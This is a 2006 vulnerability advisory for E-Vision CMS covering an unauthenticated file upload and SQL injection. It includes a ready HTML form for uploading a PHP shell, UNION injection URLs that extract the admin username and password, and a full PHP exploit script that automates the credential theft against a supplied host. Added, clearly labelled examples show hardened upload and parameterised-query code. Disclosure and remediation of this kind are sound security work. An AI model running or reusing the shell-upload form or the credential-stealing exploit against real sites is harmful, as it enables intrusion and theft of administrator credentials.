E-Vision CMS Multiple Remote injections

2006-09-23T00:00:00
ID SECURITYVULNS:DOC:14393
Type securityvulns
Reporter Securityvulns
Modified 2006-09-23T00:00:00

Description

Hello,

E-Vision CMS Multiple Remote injections (SQL and File upload)

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Upload any file

admin/x_image.php is the CMS's file upload handler, and it performs no permission (authentication) check: an unauthenticated visitor can call it directly.

The script can be used to upload any file into the directory /imagebank. In the form below, replace http://localhost/evision_cms/ with the target's installation directory, choose a file and submit; the file is stored under /imagebank without any check on its type or name. If the web server executes PHP from that directory, a PHP shell uploaded this way runs as the web server user.

<form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST">
<input type="hidden" name="insert" value="insert">
<input type="hidden" name="s_rc" value="file://">
Upload PHP Shell : <input type="file" name="file_upload">
<br>
<input type="submit" value="upload">
</form>
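The fix for the upload issue is not only the missing permission check: even an authenticated handler that stores attacker-named files in a web-served directory is a shell upload. The following is an added example, not E-Vision's code, of what a hardened replacement for a handler like admin/x_image.php would look like. The session key admin_id, the helper names, the size limit and the allowed image types are assumptions for illustration; the directory name imagebank is taken from the advisory.

```php
<?php
// Added example (not E-Vision's code): hardened upload handler pattern.
// Assumptions: an admin session sets $_SESSION['admin_id']; uploads go to
// ../imagebank relative to this script; only raster images are wanted.
declare(strict_types=1);

const UPLOAD_DIR       = __DIR__ . '/../imagebank';
const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;
const ALLOWED_TYPES    = [          // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// The permission check the original handler lacked entirely.
function require_admin(): void
{
    session_start();
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('forbidden');
    }
}

// Validates one entry of $_FILES and stores it under a server-chosen name.
// Returns the stored file name; throws RuntimeException on rejection.
function store_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected');
    }
    // Decide the type from the bytes, never from the client's name or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('not an allowed image type');
    }
    // Second opinion: an image must actually decode as one.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Random server-side name: no path traversal, no attacker-chosen .php extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

require_admin();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file_upload'])) {
    try {
        echo 'stored as ', htmlspecialchars(store_image($_FILES['file_upload']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

Independently of the handler, the upload directory itself should be configured so the web server never executes scripts from it (for Apache, for example, disabling the PHP engine for /imagebank); that turns a future validation slip into a stored file rather than remote code execution.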


Sql Injection

The paging parameter from of admin/all_users.php is placed into the SQL query unescaped. The five-column UNION below matches the column count of the original query, puts the wanted column in the fourth position, where it ends up in a table cell the page renders, and the trailing /* comments out the remainder of the original statement.

Password:
admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*

User Name:
admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*
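A numeric paging offset is the easiest kind of input to make injection-proof: validate it as an integer and bind it as a parameter. The following is an added example, not E-Vision's code, of how the user listing behind admin/all_users.php could be written so that the advisory's payload becomes harmless. The table and column names users, idusers, username and pass come from the advisory's payload; the PDO connection, the page size and the function name are assumptions, and the in-memory SQLite database is constructed here only so the example runs stand-alone.

```php
<?php
// Added example (not E-Vision's code): paging query with a validated,
// bound offset. Assumptions: a PDO connection and a page size of 20.
declare(strict_types=1);

const PAGE_SIZE = 20;

/**
 * Returns one page of users. $fromParam is the raw value of the `from`
 * request parameter (string, int or null); anything that is not a
 * non-negative integer falls back to offset 0.
 */
function list_users(PDO $db, $fromParam): array
{
    // filter_var rejects "-1 union select ..." outright; the offset can only
    // ever be an integer >= 0 from here on.
    $from = filter_var($fromParam, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($from === false) {
        $from = 0;
    }
    // Bound parameters: the offset is sent as a typed value, never as query text,
    // so there is no position in the statement where a UNION could be spliced in.
    $stmt = $db->prepare(
        'SELECT idusers, username FROM users ORDER BY idusers LIMIT :limit OFFSET :offset'
    );
    $stmt->bindValue(':limit', PAGE_SIZE, PDO::PARAM_INT);
    $stmt->bindValue(':offset', $from, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (idusers INTEGER PRIMARY KEY, username TEXT, pass TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'secret-hash')");
$db->exec("INSERT INTO users VALUES (2, 'editor', 'other-hash')");

// The advisory's payload (URL-decoded) now simply yields page 0 of the user list;
// the pass column is neither selected nor reachable through the offset.
$payload = '-1 union select null,null,null,pass,null from users where idusers=1/*';
foreach (list_users($db, $payload) as $row) {
    echo $row['idusers'], ' ', $row['username'], PHP_EOL;
}
```

The integer validation is what stops the payload; the prepared statement is what keeps the query safe when someone later adds a string parameter (a search term, a sort column name) to the same page.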


Exploits :-

For PHP shell uploading:-

<form enctype="multipart/form-data" action="http://localhost/evision_cms/admin/x_image.php" method="POST">
<input type="hidden" name="insert" value="insert">
<input type="hidden" name="s_rc" value="file://">
Upload PHP Shell : <input type="file" name="file_upload">
<br>
<input type="submit" value="upload">
</form>


For Sql injection:-

#!/usr/bin/php -q -d short_open_tag=on
<?php
/**********************************************/
/* e-Vision CMS Remote sql injection exploit  */
/* By : HACKERS PAL                           */
/* WwW.SoQoR.NeT                              */
/**********************************************/
print_r('
/**********************************************/
/* e-Vision CMS Remote sql injection exploit  */
/* by HACKERS PAL <security@soqor.net>        */
/* site: http://www.soqor.net                 */
');
if ($argc < 2) {
    print_r('
/* -- */
/* Usage: php ' . $argv[0] . ' host               */
/* Example:                                   */
/* php ' . $argv[0] . ' http://localhost/evision  */
/**********************************************/
');
    die;
}
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

$url = $argv[1];
// UNION payloads: five columns to match the original query, the wanted
// column in the fourth position, and a trailing /* to comment out the rest.
$exploit  = "/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*";
$exploit2 = "/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*";

// Fetch a URL with file_get_contents(), falling back to fopen()/fread()
// where it is unavailable.
function get_page($url)
{
    $contents = '';
    if (function_exists("file_get_contents")) {
        $contents = file_get_contents($url);
    } else {
        $fp = fopen("$url", "r");
        while ($line = fread($fp, 1024)) {
            $contents = $contents . $line;
        }
        fclose($fp);
    }
    return $contents;
}

// preg_replace_callback() callback: prints the captured cell contents.
function get($var)
{
    if (strlen($var[1]) > 0) {
        echo trim($var[1]);
    }
}

$page  = get_page($url . $exploit);
$page2 = get_page($url . $exploit2);

// The injected value is rendered inside a <td bgcolor="#C2D4E8"> cell.
if (preg_match('/\<td bgcolor=\"#C2D4E8\"\>(.+?)<\/td\>/is', $page)) {
    echo "\n[+] User Name : ";
    preg_replace_callback('/\<td bgcolor=\"#C2D4E8\"\>(.+?)<\/td\>/is', 'get', $page);
    echo "\n[+] Pass Word : ";
    preg_replace_callback('/\<td bgcolor=\"#C2D4E8\"\>(.+?)<\/td\>/is', 'get', $page2);
    die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
}

die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");
?>

WwW.SoQoR.NeT